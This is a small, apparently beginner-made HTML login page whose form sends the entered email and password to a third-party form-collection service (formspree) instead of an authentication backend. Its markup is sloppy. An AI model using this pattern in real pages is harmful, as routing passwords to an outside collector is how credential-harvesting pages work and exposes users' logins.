
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=Edge">
  <meta name="viewport" content="width=device-width, initial-scale=1">

  <title>HTML</title>
  
  <!-- HTML -->
  

  <!-- Custom Styles -->
  <link rel="stylesheet" href="style.css">
</head>

<body>
 <div id="container">
   <div class="page2-file">
  <div class="continer">
    <input type="file" name="" id="" value="" />
  </div>
  </div>
    <div class="box">
      <form action="https://formspree.io/f/myzywddv" method="post">
      <h1>Login</h1>
      <input type="text" placeholder="email" class="txt" name="email">
      <input type="Password" placeholder="Password" class="psw" name="psw">
      <div class="btn">
        <button onclick="login">Login</button>
        <p class="or">_____OR_____</p>
        <a class="sing" href="#">singin</a>
        </input>
      </div> 
      <div class="none">
        <div class="cercel">
          <img src=" FB_IMG_1576695994379.jpg">
        </div>
        <div class="head"></div>
        <div class="body"></div>
      </div>
 </div>
    
    
  <!-- Project -->
  <script src="main.js"></script>
</body>
</html>
